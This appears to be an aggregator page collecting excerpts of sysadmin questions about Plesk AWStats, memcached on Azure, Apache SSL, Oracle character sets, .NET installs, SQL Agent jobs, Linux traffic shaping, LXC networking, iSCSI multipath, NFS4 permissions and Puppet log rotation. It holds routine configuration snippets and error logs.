    Turn off all AWStats for Plesk 11+ domains:

        #!/bin/bash
        for i in /var/www/vhosts/*; do
            echo "Turning off and deleting Stats for"
            echo `basename $i`
            /usr/local/psa/admin/bin/webstatmng --unset-configs --stat-prog=awstats --domain-name=`basename $i`
            /usr/local/psa/admin/bin/webstatmng --clean --stat-prog=awstats --domain-name=`basename $i`
        done

    Read the article

  • Memcached session manager in Azure: Connection gets forcibly closed

    - by Edgar Pérez
    I am using Memcached Session Manager to handle Tomcat sessions in non-sticky mode. My deployment in Azure consists of a Worker Role with two instances which connect to an Azure VM running my memcached server. Everything works pretty well: my session is persisted and retrieved by either of the two instances transparently. The problem arises when the session is idle for about 4 minutes; everything points to the Azure load balancer closing the spymemcached connection to the VM after some period of inactivity. My MSM configuration is this:

        <Manager className="de.javakaffee.web.msm.MemcachedBackupSessionManager"
            memcachedNodes="n1:my-azure-vm.cloudapp.net:11211"
            sticky="false"
            sessionBackupAsync="false"
            sessionBackupTimeout="10000"
            lockingMode="uriPattern:/path1|/path2"
            requestUriIgnorePattern=".*\.(ico|png|gif|jpg|css|js|ttf|eot|svg|woff)$"
            transcoderFactoryClass="de.javakaffee.web.msm.serializer.kryo.KryoTranscoderFactory"
            customConverter="de.javakaffee.web.msm.serializer.kryo.HibernateCollectionsSerializerFactory"/>

    The stacktrace printed by the spymemcached client is this:

        INFO net.spy.memcached.MemcachedConnection: Reconnecting due to exception on {QA sa=/10.194.132.206:13000, #Rops=1, #Wops=0, #iq=0, topRop=net.spy.memcached.protocol.binary.StoreOperationImpl@1d95da8, topWop=null, toWrite=0, interested=1}
        java.io.IOException: An existing connection was forcibly closed by the remote host
            at sun.nio.ch.SocketDispatcher.read0(Native Method)
            at sun.nio.ch.SocketDispatcher.read(Unknown Source)
            at sun.nio.ch.IOUtil.readIntoNativeBuffer(Unknown Source)
            at sun.nio.ch.IOUtil.read(Unknown Source)
            at sun.nio.ch.SocketChannelImpl.read(Unknown Source)
            at net.spy.memcached.MemcachedConnection.handleReads(MemcachedConnection.java:303)
            at net.spy.memcached.MemcachedConnection.handleIO(MemcachedConnection.java:264)
            at net.spy.memcached.MemcachedConnection.handleIO(MemcachedConnection.java:184)
            at net.spy.memcached.MemcachedClient.run(MemcachedClient.java:1298)

    Given this idle-time limitation in Azure, is there any other way to make MSM work in the Azure cloud?

    Read the article

  • ssl_error_rx_record_too_long connection error with SSL site in Firefox

    - by Thomas
    I am trying to set up SSL in Apache, but when I go to the server in Firefox I get the following error message:

        An error occurred during a connection to sludge.home.
        SSL received a record that exceeded the maximum permissible length.
        (Error code: ssl_error_rx_record_too_long)

    My virtual host config file looks like this:

        <IfDefine SSL>
        <VirtualHost *:443>
            ServerName sludge.home
            SSLEngine on
            SSLCertificateFile /usr/local/apache/cert/server.crt
            SSLCertificateKeyFile /usr/local/apache/cert/server.pem
            SSLProtocol -SSLv2
            SSLCipherSuite HIGH:!ADH:!EXP:!MD5:!NULL
            DocumentRoot "/usr/local/apache/htdocs"
            ServerAdmin [email protected]
            <Location />
                AuthType Digest
                AuthName "private area"
                AuthDigestDomain /
                AuthDigestProvider file
                AuthUserFile /usr/local/apache/passwd/digest_pw
                Require valid-user
            </Location>
            <Directory /usr/local/apache/htdocs/bugz>
                AddHandler cgi-script .cgi
                Options +Indexes +ExecCGI
                DirectoryIndex index.cgi
                AllowOverride Limit FileInfo Indexes
            </Directory>
            <Directory /usr/local/apache/htdocs/bugzilla>
                AddHandler cgi-script .cgi
                Options +Indexes +ExecCGI
                DirectoryIndex index.cgi
                AllowOverride Limit FileInfo Indexes
            </Directory>
            <Directory />
                Options FollowSymLinks
                AllowOverride None
                Order deny,allow
                Deny from all
            </Directory>
            <Directory "/usr/local/apache/htdocs">
                Options Indexes FollowSymLinks
                AllowOverride None
                Order allow,deny
                Allow from all
            </Directory>
            <IfModule dir_module>
                DirectoryIndex index.html
            </IfModule>
            <FilesMatch "^\.ht">
                Order allow,deny
                Deny from all
                Satisfy All
            </FilesMatch>
        </VirtualHost>
        </IfDefine>

    A telnet to this server reveals that the server is sending plain HTML back. Furthermore, it seems as though mod_ssl is not loaded/working, even though when I run httpd -l it shows up as being statically compiled in. I have exhausted most avenues I can think of.

    Read the article

  • Oracle 11gR2: NLS_CHARACTERSET accidentally removed with an UPDATE-Query

    - by Marco Nätlitz
    Hi folks, I have a fresh installation of Oracle 11gR2 x64 on CentOS. After the installation I wanted to get productive and started to import my dumps. One of the dumps caused a character-set error, so I tried to change the system's character set to the one specified in the dump. I ran a statement like this:

        UPDATE nls_database_parameters SET parameter='WS....' WHERE parameter='NLS_CHARACTERSET';

    As you can see, I wrote the value of the character set into the parameter column instead of the value column. I guess I was thinking too much about the problem instead of checking what I was typing. After the query, the NLS_CHARACTERSET parameter is gone and the server reports that the character set is "(null)". I want to put the NLS_CHARACTERSET parameter back into the table but don't know how. If I try something like this:

        INSERT INTO nls_database_parameters (PARAMETERS, VALUE) VALUES ("NLS_CHARACTERSET", "AL32UTF8");

    I get the error:

        Fehler bei Befehlszeile:1 Spalte:84
        Fehlerbericht:
        SQL-Fehler: ORA-00984: Spalte hier nicht zulässig
        00984. 00000 - "column not allowed here"
        *Cause:
        *Action:

    Sorry that the error message is in German, but it contains the Oracle error code. Do you have any idea how I can fix that? Thanks and best regards, Marco

    Read the article

  • .net Framework won't install on Server 2003 SP2 x64

    - by Yvan JANSSENS
    Hi, when I install the .NET Framework 3.5 SP1 on my rental VPS, I get the message that setup has failed. It's a Server 2003 VPS with SP2 installed (64-bit). The .NET Framework 2.0 installed correctly. How do I fix this? This is the installation log:

        [03/10/10,07:44:46] Microsoft .NET Framework 2.0a x64: [2] Failed to fetch setup file in CBaseComponent::PreInstall()
        [03/10/10,07:44:47] setup.exe: [2] ISetupComponent::Pre/Post/Install() failed in ISetupManager::InternalInstallManager() with HRESULT -2147467260.
        [03/10/10,07:44:48] setup.exe: [2] CSetupManager::RunInstallPhase() - Call to Pre/Install/Post for InstallComponents failed
        [03/10/10,07:44:49] setup.exe: [2] CSetupManager::RunInstallPhaseAndCheckResults() - RunInstallPhase() returned a NULL piActionResults
        [03/10/10,07:44:49] setup.exe: [2] CSetupManager::RunInstallFromList() - RunInstallPhaseAndCheckResults failed [2]
        [03/10/10,07:44:51] setup.exe: [2] ISetupManager::RunInstallLists(IP_PREINSTALL failed in ISetupManager::RunInstallFromThread()
        [03/10/10,07:44:52] setup.exe: [2] ISetupManager::RunInstallFromThread() failed in ISetupManager::RunInstall()
        [03/10/10,07:44:53] setup.exe: [2] CSetupManager::Run() - Call to RunInstall() failed
        [03/10/10,07:44:59] WapUI: [2] DepCheck indicates Microsoft .NET Framework 2.0a x64 is not installed.
        [03/10/10,07:45:00] WapUI: [2] DepCheck indicates XPSEPSC x64 Installer was not attempted to be installed.
        [03/10/10,07:45:02] WapUI: [2] DepCheck indicates Microsoft .NET Framework 3.0 SP2 x64 was not attempted to be installed.
        [03/10/10,07:45:02] WapUI: [2] DepCheck indicates Microsoft .NET Framework 3.5 (x64) 'package' was not attempted to be installed.
        [03/11/10,14:19:23] Microsoft .NET Framework 3.0 SP2 x64: [2] Error: Installation failed for component Microsoft .NET Framework 3.0 SP2 x64. MSI returned error code 1604
        [03/11/10,14:26:14] WapUI: [2] DepCheck indicates Microsoft .NET Framework 3.0 SP2 x64 is not installed.

    Thanks!! Yvan

    Read the article

  • MS SQL - Problem running SQL Server Agent Job via service account credentials

    - by molecule
    There are 5 steps in this job. The first step is an SSIS Package Store step; the second to fifth are file system steps. We configured them all to use Windows Authentication. Under Run As, we specified a user account which was created under Security > Credentials and SQL Server Agent > Proxies > SSIS Package Execution. The job runs without any problems with this user account. We then proceeded to configure the job to use a service account instead. The service account was specified under Security > Credentials and SQL Server Agent > Proxies > SSIS Package Execution. The job fails with this error:

        Executed as user: domain\serviceaccount. ....00 for 32-bit Copyright (C) Microsoft Corp 1984-2005. All rights reserved. Started: 3:37:57 PM
        Error: 2010-03-09 15:37:57.95 Code: 0xC0016016 Source: Description: Failed to decrypt protected XML node "DTS:Password" with error 0x8009000B "Key not valid for use in specified state.". You may not be authorized to access this information. This error occurs when there is a cryptographic error. Verify that the correct key is available. End Error
        Error: 2010-03-09 15:38:01.19 Code: 0xC0047062 Source: Get CONT_VIEW_LADDER in latest 45days OracleFMDatabase [1] Description: System.Data.OracleClient.OracleException: ORA-01005: null password given; logon denied at System.Data.OracleClient.OracleException.Check(OciErrorHandle errorHandle, Int32 rc) at System.Data.OracleClient.OracleInternalConnection.OpenOnLocalTransaction(String userName, String password, String serverName, Boo... The package execution fa... The step failed.

    Based on some research, I then opened the project in MS Visual Studio and changed the package security property from "EncryptSensitiveWithUserKey" to "DontSaveSensitive", but I still get the above error. I am new to this, so any help will be very much appreciated. Thanks in advance.

    Read the article

  • Ingress filtering in Linux traffic control: Redirect traffic to IFB device

    - by Dani Camps
    I have an OpenWrt router and I want to shape incoming traffic in order to classify all the traffic addressed to a certain IP address in my home network as low priority. For that purpose I want to redirect all traffic incoming on the eth1 interface, the one connected to the DSL modem, to an IFB device where I will do the shaping. These are the details of my system:

        Linux OpenWrt 2.6.32.27 #7 Fri Jul 15 02:43:34 CEST 2011 mips GNU/Linux

    Here is the script I am using, where the last instruction is failing:

        # Variable definition
        ETH=eth1
        IFB=ifb1
        IP_LP="192.168.1.22/32"
        DL_RATE="900kbps"
        HP_RATE="890kbps"
        LP_RATE="10kbps"
        TC="tc"

        # Configuring the ifbX interface
        insmod ifb
        insmod sch_htb
        insmod sch_ingress
        ifconfig $IFB up

        # Adding the HTB scheduler to the ingress interface
        $TC qdisc add dev $IFB root handle 1: htb default 11

        # Set the maximum bandwidth that each priority class can get, and the maximum borrowing they can do
        $TC class add dev $IFB parent 1:1 classid 1:10 htb rate $LP_RATE ceil $DL_RATE
        $TC class add dev $IFB parent 1:1 classid 1:11 htb rate $HP_RATE ceil $DL_RATE

        # Redirect all ingress traffic arriving at $ETH to $IFB
        $TC qdisc del dev $ETH ingress 2>/dev/null
        $TC qdisc add dev $ETH ingress
        $TC filter add dev $ETH parent ffff: protocol ip prio 1 u32 \
            match u32 0 0 flowid 1:1 \
            action mirred egress redirect dev $IFB

    The last instruction fails with:

        Action 4 device ifb1 ifindex 9
        RTNETLINK answers: No such file or directory
        We have an error talking to the kernel

    Does anyone know what I am doing wrong? Best Regards, Daniel

    Read the article

  • When I restart my virtual environment it does not re-bind to the IP address

    - by RoboTamer
    The IP no longer responds to a remote ping. By restart I mean:

        lxc-stop -n vm3
        lxc-start -n vm3 -f /etc/lxc/vm3.conf -d

    /etc/network/interfaces:

        auto lo
        iface lo inet loopback
            up route add -net 127.0.0.0 netmask 255.0.0.0 dev lo
            down route add -net 127.0.0.0 netmask 255.0.0.0 dev lo

        # device: eth0
        auto eth0
        iface eth0 inet manual

        auto br0
        iface br0 inet static
            address 192.22.189.58
            netmask 255.255.255.248
            gateway 192.22.189.57
            broadcast 192.22.189.63
            bridge_ports eth0
            bridge_fd 0
            bridge_hello 2
            bridge_maxage 12
            bridge_stp off
            post-up ip route add 192.22.189.59 dev br0
            post-up ip route add 192.22.189.60 dev br0
            post-up ip route add 192.22.189.61 dev br0
            post-up ip route add 192.22.189.62 dev br0

    /etc/lxc/vm3.conf:

        lxc.utsname = vm3
        lxc.rootfs = /var/lib/lxc/vm3/rootfs
        lxc.tty = 4
        #lxc.pts = 1024                        # pseudo tty instance for strict isolation
        lxc.network.type = veth
        lxc.network.flags = up
        lxc.network.link = br0
        lxc.network.name = eth0
        lxc.network.mtu = 1500
        #lxc.cgroup.cpuset.cpus = 0
        # security parameter
        lxc.cgroup.devices.deny = a            # Deny all access to devices
        lxc.cgroup.devices.allow = c 1:3 rwm   # dev/null
        lxc.cgroup.devices.allow = c 1:5 rwm   # dev/zero
        lxc.cgroup.devices.allow = c 5:1 rwm   # dev/console
        lxc.cgroup.devices.allow = c 5:0 rwm   # dev/tty
        lxc.cgroup.devices.allow = c 4:0 rwm   # dev/tty0
        lxc.cgroup.devices.allow = c 4:1 rwm   # dev/tty1
        lxc.cgroup.devices.allow = c 4:2 rwm   # dev/tty2
        lxc.cgroup.devices.allow = c 1:9 rwm   # dev/urandom
        lxc.cgroup.devices.allow = c 1:8 rwm   # dev/random
        lxc.cgroup.devices.allow = c 136:* rwm # dev/pts/*
        lxc.cgroup.devices.allow = c 5:2 rwm   # dev/pts/ptmx
        lxc.cgroup.devices.allow = c 254:0 rwm # rtc

        # mount points
        lxc.mount.entry=proc /var/lib/lxc/vm3/rootfs/proc proc nodev,noexec,nosuid 0 0
        lxc.mount.entry=devpts /var/lib/lxc/vm3/rootfs/dev/pts devpts defaults 0 0
        lxc.mount.entry=sysfs /var/lib/lxc/vm3/rootfs/sys sysfs defaults 0 0

    Read the article

  • How to get Multipath IO with Dell MD3600i into an active/active setup?

    - by Disco
    I'm desperately trying to improve the performance of my SAN connection. Here's what I have:

        [root@xnode1 dell]# multipath -ll
        mpath1 (36d4ae520009bd7cc0000030e4fe8230b) dm-2 DELL,MD36xxi
        [size=5.5T][features=3 queue_if_no_path pg_init_retries 50][hwhandler=1 rdac][rw]
        \_ round-robin 0 [prio=200][active]
         \_ 18:0:0:0 sdb 8:16  [active][ready]
         \_ 19:0:0:0 sdd 8:48  [active][ghost]
         \_ 20:0:0:0 sdf 8:80  [active][ghost]
         \_ 21:0:0:0 sdh 8:112 [active][ready]

    And multipath.conf:

        defaults {
            udev_dir              /dev
            polling_interval      5
            prio_callout          none
            rr_min_io             100
            max_fds               8192
            user_friendly_names   yes
            path_grouping_policy  multibus
            default_features      "1 fail_if_no_path"
        }
        blacklist {
            device {
                vendor  "*"
                product "Universal Xport"
            }
        }
        devices {
            device {
                vendor            "DELL"
                product           "MD36xxi"
                path_checker      rdac
                path_selector     "round-robin 0"
                hardware_handler  "1 rdac"
                failback          immediate
                features          "2 pg_init_retries 50"
                no_path_retry     30
                rr_min_io         100
                prio_callout      "/sbin/mpath_prio_rdac /dev/%n"
            }
        }

    And the sessions:

        [root@xnode1 dell]# iscsiadm -m session
        tcp: [13] 10.0.51.220:3260,1 iqn.1984-05.com.dell:powervault.md3600i.6d4ae520009bd7cc000000004fd7507c
        tcp: [14] 10.0.50.221:3260,2 iqn.1984-05.com.dell:powervault.md3600i.6d4ae520009bd7cc000000004fd7507c
        tcp: [15] 10.0.51.221:3260,2 iqn.1984-05.com.dell:powervault.md3600i.6d4ae520009bd7cc000000004fd7507c
        tcp: [16] 10.0.50.220:3260,1 iqn.1984-05.com.dell:powervault.md3600i.6d4ae520009bd7cc000000004fd7507c

    I'm getting very poor read performance:

        dd if=/dev/mapper/mpath1 of=/dev/null bs=1M count=1000

    The SAN is configured as follows:

        CTRL0,PORT0 : 10.0.50.220
        CTRL0,PORT1 : 10.0.50.221
        CTRL1,PORT0 : 10.0.51.220
        CTRL1,PORT1 : 10.0.51.221

    And on the host (dual 10GbE Ethernet card, Intel DA2):

        IF0 : 10.0.50.1
        IF1 : 10.0.51.1

    It's connected to a 10GbE switch dedicated to SAN traffic. My question is: why is the connection set up as 'ghost' and not 'ready', like an active/active configuration?

    Read the article

  • NFS4 permission denied when userid does not match (even though idmap is working)

    - by SystemParadox
    I have NFS4 set up with idmapd working correctly. ls -l from the client shows the correct user names, even though the user ids differ between the machines. However, when the user ids do not match, I get 'permission denied' errors trying to access files, even though ls -l shows the correct username. When the user ids do happen to match by coincidence, everything works fine.

        sudo sysctl -w sunrpc.nfsd_debug=1023

    gives the following output in the server syslog for the failed file access:

        nfsd_dispatch: vers 4 proc 1
        nfsv4 compound op #1/3: 22 (OP_PUTFH)
        nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba)
        nfsv4 compound op ffff88003d0f5078 opcnt 3 #1: 22: status 0
        nfsv4 compound op #2/3: 3 (OP_ACCESS)
        nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba)
        nfsd: fh_verify - just checking
        nfsv4 compound op ffff88003d0f5078 opcnt 3 #2: 3: status 0
        nfsv4 compound op #3/3: 9 (OP_GETATTR)
        nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba)
        nfsd: fh_verify - just checking
        nfsv4 compound op ffff88003d0f5078 opcnt 3 #3: 9: status 0
        nfsv4 compound returned 0
        nfsd_dispatch: vers 4 proc 1
        nfsv4 compound op #1/7: 22 (OP_PUTFH)
        nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba)
        nfsv4 compound op ffff88003d0f5078 opcnt 7 #1: 22: status 0
        nfsv4 compound op #2/7: 32 (OP_SAVEFH)
        nfsv4 compound op ffff88003d0f5078 opcnt 7 #2: 32: status 0
        nfsv4 compound op #3/7: 18 (OP_OPEN)
        NFSD: nfsd4_open filename dom_file op_stateowner (null)
        renewing client (clientid 4f96587d/0000000e)
        nfsd: nfsd_lookup(fh 28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba, dom_file)
        nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba)
        nfsd: fh_verify - just checking
        nfsd: fh_lock(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba) locked = 0
        nfsd: fh_compose(exp 08:01/22806529 srv/dom_file, ino=22809724)
        nfsd: fh_verify(36: 01070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba)
        nfsd: fh_verify - just checking
        fh_verify: srv/dom_file permission failure, acc=804, error=13
        nfsv4 compound op ffff88003d0f5078 opcnt 7 #3: 18: status 13
        nfsv4 compound returned 13

    Is that useful to anyone? Any hints on how to debug this would be greatly appreciated.

    Server kernel: 2.6.32-40-server (Ubuntu 10.04)
    Client kernel: 3.2.0-27-generic (Ubuntu 12.04)

    Same problem with my new server running 3.2.0-27-generic (Ubuntu 12.04). Thanks.

    Read the article

  • What causes this logrotate behavior in Puppet?

    - by ujjain
    After running logrotate, Puppet starts writing its logs into /var/log/puppet/masterhttp.log-20130616. How come it doesn't keep logging to /var/log/puppet/masterhttp.log? The normal behavior, as I understand it, is to rename the original log file as the archive and start writing to a fresh, empty log file.

        [root@puppetmaster puppet]# ls -al
        total 97520
        drwxr-x---.  2 puppet puppet     4096 Jun 16 03:24 .
        drwxr-xr-x. 12 root   root       4096 Jul  1 09:11 ..
        -rw-r--r--.  1 puppet puppet        0 Jun 16 03:24 masterhttp.log
        -rw-rw----.  1 puppet puppet 99847187 Jul  1 09:19 masterhttp.log-20130616

        [root@puppetmaster init.d]# cat /etc/logrotate.d/puppet
        /var/log/puppet/*log {
            missingok
            notifempty
            create 0644 puppet puppet
            sharedscripts
            postrotate
                pkill -USR2 -u puppet -f /usr/sbin/puppetmasterd || true
                [ -e /etc/init.d/puppet ] && /etc/init.d/puppet reload > /dev/null 2>&1 || true
            endscript
        }
        [root@puppetmaster init.d]#

    How can I make Puppet log to /var/log/puppet/masterhttp.log and not to /var/log/puppet/masterhttp.log-20130616? Even restarting Puppet doesn't make it log into /var/log/puppet/masterhttp.log instead of /var/log/puppet/masterhttp.log-20130616.

    Read the article
